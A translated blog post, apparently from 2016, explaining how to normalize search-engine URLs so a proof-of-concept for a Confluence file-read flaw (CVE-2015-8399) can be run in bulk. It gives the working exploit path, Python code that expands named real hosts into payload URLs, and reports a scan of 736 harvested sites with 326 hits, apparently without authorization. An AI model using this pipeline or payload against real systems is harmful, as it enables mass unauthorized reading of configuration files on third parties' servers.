When doing bulk POC verification, the URLs we collect come in many different forms.
So we need to normalize the URLs so that the POC script can accurately validate each one.
This post takes a real vulnerability as the example and gives my bulk POC solution.
Vulnerability example
Atlassian Confluence before 5.8.17 had a vulnerability: spaces/viewdefaultdecorator.action
and admin/viewdefaultdecorator.action
did not sufficiently filter the 'decoratorName'
parameter. A remote attacker could exploit it to read configuration files.
Detailed references:
http://zone.wooyun.org/content/27104
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2016010311
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399
The file read is simple to exploit: requesting the following location lists the files of the current directory:
/spaces/viewdefaultdecorator.action?decoratorName=.
Now we have the following types of URLs in the search engine:
1. wiki.kuali.org
2. http://dev.aixuedai.com:8090/
3. https://wiki.netdef.org/display/osr/Home
4. http://cwiki.apache.org/confluence/display/Hive/HCatalog/?id=2#
Now consider how the POC should be written to accommodate these different forms of URL.
Solution
For the first two, we unify the URL format (a scheme, no trailing slash) so that the POC script can open them correctly. For the third and fourth, the collected URL has a multi-level directory and even query parameters: from which level do we start appending the payload for verification?
My approach: first clean up the format, then take the useful parts of the URL and build a new base URL from them, and then enumerate the directory levels so that each one is tried.
Operation Process
- Original URL:
http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog/?id=2#
- Extracted URL parts:
Protocol: http
Domain name: cwiki.apache.org
Port: 8090
Path: /confluence/display/Hive/HCatalog/
Params: id=2
Fragment: empty (the trailing '#')
- Decompose the path
path_list = ['confluence', 'display', 'Hive', 'HCatalog']
- Remove the useless parts (params, fragment), enumerate the path levels, and combine them into new URLs
poc_list = [
'http://cwiki.apache.org:8090',
'http://cwiki.apache.org:8090/confluence',
'http://cwiki.apache.org:8090/confluence/display',
'http://cwiki.apache.org:8090/confluence/display/Hive',
'http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog'
]
- Append the verification path to the end of each URL in the list from step 4:
/spaces/viewdefaultdecorator.action?decoratorName=.
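The whole procedure above (unify the format of bare hosts, decompose the path, enumerate the prefixes, append the verification path) as one runnable script. This is an added example, not the original page's code and not POC-T's urlparser.py. It assumes a scheme-less hit is reached over plain http and uses the four search-engine hits quoted earlier as sample input; it goes slightly beyond the text by deduplicating targets that several hits produce in common.

```python
from urllib.parse import urlparse, urlunsplit, urljoin

# Verification path from the write-up, appended to every candidate base URL.
PAYLOAD = "/spaces/viewdefaultdecorator.action?decoratorName=."

# The four search-engine hits quoted in the text, reused here as sample input.
SAMPLE_HITS = [
    "wiki.kuali.org",
    "http://dev.aixuedai.com:8090/",
    "https://wiki.netdef.org/display/osr/Home",
    "http://cwiki.apache.org/confluence/display/Hive/HCatalog/?id=2#",
]


def normalize(raw):
    """Unify the format: a bare host gets a scheme so urlparse puts it in netloc.

    Assumption: a scheme-less hit is reached over plain http. Without this,
    urlparse('wiki.kuali.org') treats the whole string as a path.
    """
    raw = raw.strip()
    if "://" not in raw:
        raw = "http://" + raw
    return raw


def base_urls(raw):
    """Return scheme://host[:port] followed by every path prefix, shallowest first.

    Query string and fragment are dropped: urljoin() with an absolute path
    replaces everything after the authority.
    """
    url = normalize(raw)
    p = urlparse(url)
    bases = [urlunsplit((p.scheme, p.netloc, "", "", ""))]
    prefix = ""
    for part in p.path.replace("//", "/").strip("/").split("/"):
        if not part:            # path was "" or "/": nothing to enumerate
            continue
        prefix += "/" + part
        bases.append(urljoin(url, prefix))
    return list(dict.fromkeys(bases))   # dedupe, keep order


def poc_urls(raw, payload=PAYLOAD):
    """Append the verification path to every base produced from one hit."""
    return [base.rstrip("/") + payload for base in base_urls(raw)]


def expand_targets(hits, payload=PAYLOAD):
    """Expand a whole list of hits; a target reached from several hits is kept once."""
    targets = []
    for hit in hits:
        targets.extend(poc_urls(hit, payload))
    return list(dict.fromkeys(targets))


if __name__ == "__main__":
    for target in expand_targets(SAMPLE_HITS):
        print(target)
```

Each target is then requested by the POC module; deciding whether the response is the directory listing is the module's job and is not shown here.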
Batch Practice
Using Python's built-in urlparse module to format the URL, I added the following two functions to meet our needs.
try:
    from urllib.parse import urlparse, urlunsplit, urljoin  # Python 3
except ImportError:
    from urlparse import urlparse, urlunsplit, urljoin        # Python 2, as used by POC-T at the time


def get_domain(url):
    """
    added by CDXY 8 Jun, 2016
    use:    get_domain('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')
    return: 'http://cdxy.me:80'
    """
    p = urlparse(url)
    # keep only scheme and netloc; drop path, query and fragment
    return urlunsplit([p.scheme, p.netloc, '', '', ''])


def iterate_path(ori_str):
    """
    added by CDXY 8 Jun, 2016
    use:    iterate_path('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')
    return: ['http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#',
             'http://cdxy.me:80',
             'http://cdxy.me:80/cdsa',
             'http://cdxy.me:80/cdsa/cda',
             'http://cdxy.me:80/cdsa/cda/aaa.jsp']
    """
    parser = urlparse(ori_str)
    _ans_list = [ori_str]                   # the original URL is tried as-is too
    _ans_list.append(get_domain(ori_str))   # then the bare scheme://host:port
    # collapse '//' and split the path into its directory levels
    _path_list = parser.path.replace('//', '/').strip('/').split('/')
    s = ''
    for each in _path_list:
        s += '/' + each
        # urljoin with an absolute path replaces path, query and fragment
        _ans_list.append(urljoin(ori_str, s))
    return _ans_list
The POC script for this vulnerability is now integrated into my concurrency framework.
The scan result was 326 / 736;
the hit rate is still quite high.
Report
- Concurrency framework https://github.com/Xyntax/POC-T
- Modified urlparser.py https://github.com/Xyntax/POC-T/blob/master/lib/utils/urlparser.py
- This vulnerability authentication Module https://github.com/Xyntax/POC-T/blob/master/module/confluence-file-read.py
This solves the problem of adapting the POC script to many different URL forms.